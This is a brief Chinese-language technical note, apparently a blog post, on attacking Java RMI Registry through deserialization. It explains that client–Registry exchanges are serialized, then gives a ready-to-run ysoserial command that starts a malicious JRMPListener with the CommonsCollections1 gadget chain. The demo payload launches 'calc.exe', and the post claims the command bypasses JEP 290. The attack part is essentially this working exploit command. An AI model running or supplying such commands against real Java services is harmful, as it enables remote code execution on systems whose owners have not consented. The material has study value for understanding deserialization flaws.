原理
Client和Server传递数据到Registry是通过序列化数据的, 返回的结果自然也是序列化数据, 所以Client和Server在与Registry交互的过程中自然也会触发反序列化.
攻击
可以直接使用ysoserial生成恶意的Registry: 不受JEP 290影响
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections1 'calc.exe'
若有收获,就点个赞吧
0 人点赞
